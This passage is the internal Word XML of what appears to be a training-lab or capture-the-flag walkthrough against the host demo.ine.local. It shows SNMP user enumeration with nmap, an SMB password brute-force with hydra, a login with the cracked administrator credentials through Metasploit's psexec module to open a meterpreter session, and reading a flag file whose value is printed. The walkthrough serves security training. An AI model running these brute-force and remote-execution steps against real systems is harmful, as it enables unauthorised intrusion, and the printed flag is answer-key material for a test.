      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> SNMP scripts on the target machine and store its output to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>snmp_output</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3279B400" w14:textId="14B27A70" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="008D04B8" w:rsidP="000A2232">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E0FC64C" wp14:editId="4FDE2D21">
            <wp:extent cx="5874052" cy="4127712"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="21391750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75043" name="Picture 2139175043"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5874052" cy="4127712"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FB30A8" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> script scan would take some time. Please wait patiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C86498B" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>From the list of information retrieved, we found a couple of engaging data, such as running processes, users, services, installed applications, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C008ED" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>However, analyzing the results, one absorbing information we could extract is the list of Windows users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70235C1D" w14:textId="0CB1367F" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="008D04B8" w:rsidP="000A2232">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="058462FB" wp14:editId="21D4CCE5">
            <wp:extent cx="5594638" cy="1422473"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="1740778598" name="Picture 3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78598" name="Picture 35" descr="A screen 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594638" cy="1422473"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1791B395" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 8:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t> Now, let's run a brute-force attack using these windows users on SMB service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA31619" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>Remember, port 445 is open, and we can run a brute-force attack using the hydra tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A93950C" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">First, let's save two usernames in a file. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t> administrator and admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC9D0A4" w14:textId="672B196E" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="008D04B8" w:rsidP="000A2232">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B7B7A3B" wp14:editId="2168C346">
            <wp:extent cx="3791145" cy="1282766"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="765196069" name="Picture 36"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96069" name="Picture 36" descr="A computer screen with whit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791145" cy="1282766"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B55F0E7" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B07B924" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32567125" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>The hydra switches are described in the help: hydra -help. However, the most relevant parts of the command are explained below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393F74D4" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A2232">
        <w:t>-L users.txt: This is the dictionary file containing a list of users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5271C16E" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">-P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt: This tells hydra to use a dictionary file containing a list of known passwords. This </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>particular file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> (unix_passwords.txt) belongs to "Metasploit Framework"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71167FAF" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>: The target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072D5DE7" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>: This is the protocol that should be used by hydra to perform the brute-force attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72782E2C" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>After a couple of minutes, we should see the following results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0790443A" w14:textId="6F2B589D" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="00595105" w:rsidP="000A2232">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CF37A11" wp14:editId="0C81B222">
            <wp:extent cx="5848651" cy="3225966"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="79121081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10818" name="Picture 37"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5848651" cy="3225966"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44960A76" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:lastRenderedPageBreak/>
        <w:t>Thus, hydra successfully found a valid password for administrator and admin users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1C1CD8" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 9:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t> Now, we will run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> Metasploit exploit module to gain the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> session using these credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108B6B5B" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">Let's try to get a shell on this system using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>PSExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> module of the Metasploit framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F5B855" w14:textId="77777777" w:rsidR="00595105" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PSExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Microsoft Windows Authenticated User Code Execution)</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">: This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">" utility provided by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>SysInternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA23037" w14:textId="669B7573" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>Source: [https://www.rapid7.com/db/modules/exploit/windows/smb/psexec/]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2083A0" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26665C34" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEC10E1" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E506758" w14:textId="2BFBDD1B" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>show options</w:t>
      </w:r>
      <w:r w:rsidR="00595105">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D99927B" w14:textId="349E9901" w:rsidR="000A2232" w:rsidRDefault="00595105" w:rsidP="000A2232">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4360871E" wp14:editId="7D647920">
            <wp:extent cx="5867702" cy="4083260"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1445557916"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57916" name="Picture 39"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867702" cy="4083260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="260E5BE2" w14:textId="4137D94A" w:rsidR="00595105" w:rsidRPr="000A2232" w:rsidRDefault="00595105" w:rsidP="000A2232">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1697C9FF" wp14:editId="43526040">
            <wp:extent cx="5588287" cy="3594285"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="781134335" name="Picture 4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34335" name="Picture 40"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588287" cy="3594285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="179547A9" w14:textId="1287B824" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232"/>
    <w:p w14:paraId="54EAE31A" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">As we can see, we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> set RHOSTS, SMBUSER, and SMBPASS. Rest all other essential values, i.e. PAYLOAD, and LHOST, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> already set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52174BF0" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>Let's set all these values and exploit the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C91AD0" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58169B97" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="765BDD9F" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>set SMBUSER administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5220F0" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">set SMBPASS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>elizabeth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12C65A8D" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8C9203" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> If you don't gain a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> session for some reason, please re-exploit the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CA5F2C" w14:textId="68B2ED2C" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="00595105" w:rsidP="000A2232">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33419863" wp14:editId="1BFE9F89">
            <wp:extent cx="5924854" cy="3283119"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="947442830" name="Picture 4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42830" name="Picture 41"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24854" cy="3283119"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB1EBE8" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">We have successfully gained the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> session on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B403B7" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 10:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t> Now, let's read the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF548E" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5B9397" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D39F70C" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>cd C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C7767A" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56190E78" w14:textId="77777777" w:rsidR="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>type FLAG1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F64EF2" w14:textId="0E1EC9B6" w:rsidR="00595105" w:rsidRPr="000A2232" w:rsidRDefault="00595105" w:rsidP="000A2232">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E2D05DC" wp14:editId="23789E4D">
            <wp:extent cx="4388076" cy="1193861"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1186816751" name="Picture 4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16751" name="Picture 43" descr="A black screen with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388076" cy="1193861"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4CFDDE" w14:textId="2900CC57" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="00595105" w:rsidP="000A2232">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EABE6DF" wp14:editId="6E06D764">
            <wp:extent cx="5315223" cy="3778444"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="114073124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31245" name="Picture 1140731245"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5315223" cy="3778444"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56179025" w14:textId="77777777" w:rsidR="00595105" w:rsidRDefault="00595105" w:rsidP="000A2232">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16B3F32F" w14:textId="655DAF36" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FLAG:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t> a8f5f167f44f4964e6c998dee827110c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C446F3D" w14:textId="77777777" w:rsidR="00853ABF" w:rsidRDefault="00853ABF"/>
    <w:sectPr w:rsidR="00853A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81672"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="75F2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655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487"/>
    <w:rsid w:val="000A2232"/>
    <w:rsid w:val="00503303"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595105"/>
    <w:rsid w:val="00595B1E"/>
